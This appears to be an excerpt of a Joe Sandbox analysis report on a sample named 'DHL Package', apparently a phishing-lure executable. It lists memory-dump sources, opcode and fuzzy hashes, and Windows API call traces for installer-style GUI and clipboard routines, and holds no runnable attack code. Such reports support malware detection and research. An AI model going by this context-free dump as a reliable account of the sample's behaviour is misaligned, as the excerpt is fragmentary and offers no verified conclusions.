                                                                                                • Instruction Fuzzy Hash: 25C1A2B4E01218CFEB54DFA5C994B9DBBB2FF89301F1081AAD809AB355DB345A85CF50
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e88072019ed6465e71e2fa1434d48e474bb47f2ee53db3a6664b51f620b04a4d
                                                                                                • Instruction ID: 7dff751720dadafb211fd447936b4354dee758e46890fa97403eee704ee6feb6
                                                                                                • Opcode Fuzzy Hash: e88072019ed6465e71e2fa1434d48e474bb47f2ee53db3a6664b51f620b04a4d
                                                                                                • Instruction Fuzzy Hash: AFC1A1B4E01218CFEB54DFA5C994B9DBBB2BF89301F2081AAD809A7355DB345E85CF50
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c5c56fda889da1793ab04fe959675b77fe8fb33d0db3b3013c7e702ec4ff5113
                                                                                                • Instruction ID: 85648e4c6b836d6f6f8e54692c26918c0acc2f0df9ea8b6b0613a2da611e26e2
                                                                                                • Opcode Fuzzy Hash: c5c56fda889da1793ab04fe959675b77fe8fb33d0db3b3013c7e702ec4ff5113
                                                                                                • Instruction Fuzzy Hash: 94C1C3B4E01218CFEB54DFA5C990B9DBBB2BF89300F2091A9D408AB355DB355E85CF50
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 26296250977f501663424520164fd506b02cbd38dbd8d84cfa15782f0850c2c5
                                                                                                • Instruction ID: 936248d9dd30a898fe28e109acd7eeb6e987870217dbd4a1b5a26594c685a621
                                                                                                • Opcode Fuzzy Hash: 26296250977f501663424520164fd506b02cbd38dbd8d84cfa15782f0850c2c5
                                                                                                • Instruction Fuzzy Hash: FBC1B274E01218CFEB54DFA5C994B9DBBB2BF89300F2091AAD409AB355DB385E85CF50
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2e19236c50700ad9c686289d2563c0ac63e1953631387f5b37aa9f2833137ee5
                                                                                                • Instruction ID: fa745fa22aecd47b2903800bfbf3f43d3dee898722d90d56703b00deae57c222
                                                                                                • Opcode Fuzzy Hash: 2e19236c50700ad9c686289d2563c0ac63e1953631387f5b37aa9f2833137ee5
                                                                                                • Instruction Fuzzy Hash: E0C1D374E05218CFEB54DFA5C994B9DBBB2BF89300F2091A9D808AB355DB345E85CF50
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 392c44a37a72f16ecf2e589b83bbc137851bdaaf5150c5015f53955fbdce1c02
                                                                                                • Instruction ID: 046ba97cd82ee80770ab8f026c4ade82b7faf4d722a76ad2dfa9b12081537edd
                                                                                                • Opcode Fuzzy Hash: 392c44a37a72f16ecf2e589b83bbc137851bdaaf5150c5015f53955fbdce1c02
                                                                                                • Instruction Fuzzy Hash: 22C1B374E01218CFEB54DFA5C994B9DBBB2BF89300F2091A9D408AB355DB355E85CF50
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d76609c569c19ec9cf559109243acc8ae7e7509c7218042b45bf1a4f4fd3a5a8
                                                                                                • Instruction ID: d7535eee75f2dd3b8ae34894dddefd78e7ceeb55b103e8a159aea71f90bdbdc1
                                                                                                • Opcode Fuzzy Hash: d76609c569c19ec9cf559109243acc8ae7e7509c7218042b45bf1a4f4fd3a5a8
                                                                                                • Instruction Fuzzy Hash: 2BC1C3B4E01218CFEB54DFA5C994B9DBBB2BF89300F2091AAD408AB355DB355E85CF50
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4383f15f8205718a32bd0dba936681faca38375e348e8cd570ea0eae967d6606
                                                                                                • Instruction ID: 593435db52b6564f9fc6151d98daeb5d95fa9762bcd8cf8c76226fc3912f47be
                                                                                                • Opcode Fuzzy Hash: 4383f15f8205718a32bd0dba936681faca38375e348e8cd570ea0eae967d6606
                                                                                                • Instruction Fuzzy Hash: 45B17274E10218CFDB54DFA9C884A9DFBB2FF89314F2081A9D819AB365DB34A941CF54
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fa0bdec056bb6cc41ed697fde4c4c65ed895a5d1215569870226b578d46a8fc7
                                                                                                • Instruction ID: e46c52d981522061da03c129c7287565ea1dff5cf1b3e2c8704f4c9ae1be6579
                                                                                                • Opcode Fuzzy Hash: fa0bdec056bb6cc41ed697fde4c4c65ed895a5d1215569870226b578d46a8fc7
                                                                                                • Instruction Fuzzy Hash: 915182B4E006488FDB08DFAAC484A9DFBF2FF89310F248169D409AB365D7349942CF50
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 71c0dbe4a9d7524e3414d66ed4e4b72e2f258ea5782714954696c05a0fbbfa62
                                                                                                • Instruction ID: 8a590a2098995edf47895126956b473bf2127e039bffc27c704cefcf69666f7b
                                                                                                • Opcode Fuzzy Hash: 71c0dbe4a9d7524e3414d66ed4e4b72e2f258ea5782714954696c05a0fbbfa62
                                                                                                • Instruction Fuzzy Hash: AC41AEB4D022199FDB00CFA8D594BAEBBF1BF49304F5454A9E410BB390E7789A44CF94
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6274039565.0000000039AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39ac0000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 337ae8999b7d5f3870dda4fdd57ec90a7c323a530871debac6627c3addae9bb1
                                                                                                • Instruction ID: 62aeaaae845d6417838e1837cc68e4dcfa43cbfd4ae7f2e0a75f54a6349b077a
                                                                                                • Opcode Fuzzy Hash: 337ae8999b7d5f3870dda4fdd57ec90a7c323a530871debac6627c3addae9bb1
                                                                                                • Instruction Fuzzy Hash: 00D06739D04218DBCB10EFA5A9411EDB3B0AB96301F1065A6991CBB111DB309A64CF86
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,00000403), ref: 004055E0
                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004055EF
                                                                                                • GetClientRect.USER32(?,?), ref: 0040562C
                                                                                                • GetSystemMetrics.USER32(00000002), ref: 00405633
                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405654
                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405665
                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405678
                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405686
                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405699
                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056BB
                                                                                                • ShowWindow.USER32(?,00000008), ref: 004056CF
                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004056F0
                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405700
                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405719
                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405725
                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 004055FE
                                                                                                  • Part of subcall function 00404366: SendMessageW.USER32(00000028,?,00000001,00404191), ref: 00404374
                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405742
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005516,00000000), ref: 00405750
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405757
                                                                                                • ShowWindow.USER32(00000000), ref: 0040577B
                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405780
                                                                                                • ShowWindow.USER32(00000008), ref: 004057CA
                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057FE
                                                                                                • CreatePopupMenu.USER32 ref: 0040580F
                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405823
                                                                                                • GetWindowRect.USER32(?,?), ref: 00405843
                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040585C
                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405894
                                                                                                • OpenClipboard.USER32(00000000), ref: 004058A4
                                                                                                • EmptyClipboard.USER32 ref: 004058AA
                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058B6
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004058C0
                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058D4
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004058F4
                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004058FF
                                                                                                • CloseClipboard.USER32 ref: 00405905
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                • String ID: {
                                                                                                • API String ID: 590372296-366298937
                                                                                                • Opcode ID: f65aa7f937581e07d3c42bb09a9e50e0b84de44c594279e18219e3c4cf2473b2
                                                                                                • Instruction ID: 548bfd7703c7e8b67cc6bd423be8dd859740628245fa72e8840ee51ebf386eb0
                                                                                                • Opcode Fuzzy Hash: f65aa7f937581e07d3c42bb09a9e50e0b84de44c594279e18219e3c4cf2473b2
                                                                                                • Instruction Fuzzy Hash: D0B159B0900609FFDB11AF61DD89AAE7B79FB44354F00803AFA45B61A0C7754E51DF68
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404DB5
                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404DC2
                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E0E
                                                                                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404E25
                                                                                                • SetWindowLongW.USER32(?,000000FC,004053B7), ref: 00404E3F
                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E53
                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404E67
                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404E7C
                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E88
                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404E9A
                                                                                                • DeleteObject.GDI32(00000110), ref: 00404E9F
                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404ECA
                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ED6
                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F71
                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404FA1
                                                                                                  • Part of subcall function 00404366: SendMessageW.USER32(00000028,?,00000001,00404191), ref: 00404374
                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FB5
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404FE3
                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404FF1
                                                                                                • ShowWindow.USER32(?,00000005), ref: 00405001
                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405102
                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405164
                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405179
                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040519D
                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051C0
                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 004051D5
                                                                                                • GlobalFree.KERNEL32(?), ref: 004051E5
                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040525E
                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405307
                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405316
                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00405340
                                                                                                • ShowWindow.USER32(?,00000000), ref: 0040538E
                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00405399
                                                                                                • ShowWindow.USER32(00000000), ref: 004053A0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                • String ID: $M$N
                                                                                                • API String ID: 2564846305-813528018
                                                                                                • Opcode ID: e7f2cc311ed861dc7a8dc689f905fe7daa5aa35bbb59c65f8d68f84c4dda8460
                                                                                                • Instruction ID: f13cb60032faeb06b1ff68bd0c1dc2f430bb97b794b1e627908efdb4cc4bd96d
                                                                                                • Opcode Fuzzy Hash: e7f2cc311ed861dc7a8dc689f905fe7daa5aa35bbb59c65f8d68f84c4dda8460
                                                                                                • Instruction Fuzzy Hash: 04127DB0900609EFDF209F95CD45AAE7BB5FB84314F10817AFA10BA2E1D7798951CF58
                                                                                                APIs
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E94
                                                                                                • ShowWindow.USER32(?), ref: 00403EB1
                                                                                                • DestroyWindow.USER32 ref: 00403EC5
                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EE1
                                                                                                • GetDlgItem.USER32(?,?), ref: 00403F02
                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F16
                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403F1D
                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403FCB
                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403FD5
                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403FEF
                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404040
                                                                                                • GetDlgItem.USER32(?,00000003), ref: 004040E6
                                                                                                • ShowWindow.USER32(00000000,?), ref: 00404107
                                                                                                • EnableWindow.USER32(?,?), ref: 00404119
                                                                                                • EnableWindow.USER32(?,?), ref: 00404134
                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040414A
                                                                                                • EnableMenuItem.USER32(00000000), ref: 00404151
                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404169
                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040417C
                                                                                                • lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004041A6
                                                                                                • SetWindowTextW.USER32(?,00423708), ref: 004041BA
                                                                                                • ShowWindow.USER32(?,0000000A), ref: 004042EE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 184305955-0
                                                                                                • Opcode ID: 6408e53a87cf1860f001efbcdeb721020d56bb7a1b3f7ff22a8272be9afdac83
                                                                                                • Instruction ID: 0a9eb52b79e7a1f6ac08be675ff74ca1e342e547d7f0445f300758720cde36e9
                                                                                                • Opcode Fuzzy Hash: 6408e53a87cf1860f001efbcdeb721020d56bb7a1b3f7ff22a8272be9afdac83
                                                                                                • Instruction Fuzzy Hash: 0EC1D0B1600305EBDB216F62ED88D2A3A78FB95745F51053EFA42B11F0CB794852DB2D
                                                                                                APIs
                                                                                                  • Part of subcall function 004067D0: GetModuleHandleA.KERNEL32(?,00000020,?,00403501,0000000B), ref: 004067E2
                                                                                                  • Part of subcall function 004067D0: GetProcAddress.KERNEL32(00000000,?), ref: 004067FD
                                                                                                • lstrcatW.KERNEL32(00437000,00423708), ref: 00403B2B
                                                                                                • lstrlenW.KERNEL32(004281C0,?,?,?,004281C0,00000000,00435800,00437000,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,77163420), ref: 00403BAB
                                                                                                • lstrcmpiW.KERNEL32(004281B8,.exe,004281C0,?,?,?,004281C0,00000000,00435800,00437000,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403BBE
                                                                                                • GetFileAttributesW.KERNEL32(004281C0), ref: 00403BC9
                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C12
                                                                                                  • Part of subcall function 00406322: wsprintfW.USER32 ref: 0040632F
                                                                                                • RegisterClassW.USER32(004291C0), ref: 00403C4F
                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C67
                                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C9C
                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403CD2
                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,004291C0), ref: 00403CFE
                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,004291C0), ref: 00403D0B
                                                                                                • RegisterClassW.USER32(004291C0), ref: 00403D14
                                                                                                • DialogBoxParamW.USER32(?,00000000,00403E58,00000000), ref: 00403D33
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                • API String ID: 1975747703-1115850852
                                                                                                • Opcode ID: decbffab92dab6520bd046f472a583eea2a16f8f1dbb073b8dd3dcaf5466dc19
                                                                                                • Instruction ID: a24d2e849b10ad8e1ed533e9d37a820f5d0e6b510d4fa7617ff35d8301a60578
                                                                                                • Opcode Fuzzy Hash: decbffab92dab6520bd046f472a583eea2a16f8f1dbb073b8dd3dcaf5466dc19
                                                                                                • Instruction Fuzzy Hash: E761B670244600BAD720AF669D45E2B3A7CEB84B0AF40457FFD41B62E2DB7D5912CA2D
                                                                                                APIs
                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040458E
                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004045A2
                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045BF
                                                                                                • GetSysColor.USER32(?), ref: 004045D0
                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045DE
                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045EC
                                                                                                • lstrlenW.KERNEL32(?), ref: 004045F1
                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004045FE
                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404613
                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 0040466C
                                                                                                • SendMessageW.USER32(00000000), ref: 00404673
                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040469E
                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046E1
                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004046EF
                                                                                                • SetCursor.USER32(00000000), ref: 004046F2
                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040470B
                                                                                                • SetCursor.USER32(00000000), ref: 0040470E
                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040473D
                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040474F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                • String ID: N$gD@
                                                                                                • API String ID: 3103080414-2715828072
                                                                                                • Opcode ID: c2a8691b99c0880d176a200d2dcbd178e790d1d94455f1632e384604a8e92c19
                                                                                                • Instruction ID: c6d0c18f0759a08483bb7b351ebc970df30fae26c4fd20534e815ca7361c8267
                                                                                                • Opcode Fuzzy Hash: c2a8691b99c0880d176a200d2dcbd178e790d1d94455f1632e384604a8e92c19
                                                                                                • Instruction Fuzzy Hash: FB6171B1900209BFDF10AF64DD85AAA7B69FB85314F00813AFA05B72D0D7789D51DB98
                                                                                                APIs
                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                • DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                • String ID: F
                                                                                                • API String ID: 941294808-1304234792
                                                                                                • Opcode ID: 80cfb8c675e835c75fd7954a1f24ba06797c47b4a778c986a5d394adc8f03950
                                                                                                • Instruction ID: d01d0d5cc9b133415a9533ecc51a0e37331fb978861fbb258d472761deeb6ec3
                                                                                                • Opcode Fuzzy Hash: 80cfb8c675e835c75fd7954a1f24ba06797c47b4a778c986a5d394adc8f03950
                                                                                                • Instruction Fuzzy Hash: 80418C71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA1A0CB34D955DFA4
                                                                                                APIs
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061C2,?,?), ref: 00406062
                                                                                                • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 0040606B
                                                                                                  • Part of subcall function 00405E36: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E46
